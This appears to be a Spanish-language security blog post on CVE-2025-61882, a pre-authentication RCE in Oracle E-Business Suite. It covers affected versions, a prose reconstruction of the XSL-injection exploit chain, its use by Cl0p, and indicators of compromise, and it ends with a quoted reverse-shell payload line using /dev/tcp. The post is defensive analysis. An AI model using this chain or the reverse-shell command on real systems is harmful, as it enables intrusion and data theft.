El 4 de octubre de 2025, Oracle publicó una alerta de seguridad para la vulnerabilidad CVE-2025-61882, que permite ejecución remota sin autenticación en Oracle E-Business Suite (EBS) dentro del componente Oracle Concurrent Processing / BI Publisher Integration.
Los aspectos clave:
- Afecta versiones 12.2.3 a 12.2.14 de EBS.
- La explotación se hace vía HTTP (y por implicación HTTPS si se usa) sin requerir credenciales. La puntuación CVSS 3.1 asignada es 9.8 (Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H)
- Oracle advierte que la explotación puede resultar en “control de Oracle Concurrent Processing” (compromiso del subsistema).
Lo interesante (y lo que le da a esta vulnerabilidad su complejidad) es que no parece tratarse de un solo bug simple, sino de una cadena de fallos menores (SSRF, parsing de XML/XSL, deserialización, manejo de “tiempo de ventana” en conexiones prolongadas) unidos para lograr RCE preautenticado. Así lo reconstruyen análisis de terceros (por ejemplo, watchTowr Labs):
Vector de entrada HTTP pre-auth
Un endpoint HTTP expuesto del módulo BI Publisher/Concurrent recibe una petición (GET/POST) que incluye una referencia a una plantilla/stylesheet externa. El servidor procede a resolver recursos referenciados.Inclusión remota / SSRF-like
El motor aceptaxsl:include
/xsl:import
/document()
con URIs HTTP, permitiendo al atacante servir un XSL malicioso desde un host controlado. El servidor descarga ese XSL y lo pasa al motor de transformación.Procesamiento XSLT con extensiones Java / gadgets
El XSL malicioso contiene llamadas a extensiones Java o a clases “gadget” disponibles en el classpath del proceso. A través de esas llamadas se invocan métodos que permiten ejecución de código del sistema (por ejemplo invocaciones que terminan usandoRuntime.exec
oProcessBuilder
, o cadenas de deserialización inseguras). Esta fase explota la exposición de APIs de alto riesgo desde el motor de transformación.Necesidad de sincronización: keep-alive
La cadena requiere mantener la conexión HTTP abierta (uso deliberado deConnection: keep-alive
) para coordinar la descarga y ejecución del XSL; cierres prematuros de la sesión interrumpen la explotación. Esto indica dependencia del ciclo de vida de la sesión/stream HTTP.Petición complementaria / activación
En la explotación observada hay al menos una interacción adicional (POST o request de confirmación) que finaliza la activación del payload o desencadena un hook secundario en memoria.Resultado: RCE y post-explotación
Una vez ejecutado el comando, los atacantes despliegan callbacks (reverse shells), cargan binarios adicionales, exfiltran datos y/o instalan mecanismos de persistencia. Varias campañas han derivado en robo de información y extorsión.
Indicadores de compromiso (IOCs) y tácticas observadas
Esta vulnerabilidad (o encadenamiento de vulnerabilidades) fue explotada activamente en campañas de exfiltración y extorsión atribuidas al grupo Cl0p, lo que indica explotación in-the-wild antes del parche.
Oracle publicó algunos IOCs en su advisory para ayudar a detección y hunting inmediato. Aquí algunos de los más relevantes:
- Direcciones IP de actividad GET/POST sospechosa:
200.107.207.26
,185.181.60.11
Hashes SHA-256 de paquetes / scripts usados en el exploit:
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
→ archivooracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
→exp.py
en el exploit6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b
→server.py
del exploit- Comando shell típico utilizado en payload: sh -c /bin/bash -i >& /dev/tcp// 0>&1
Comentarios
Publicar un comentario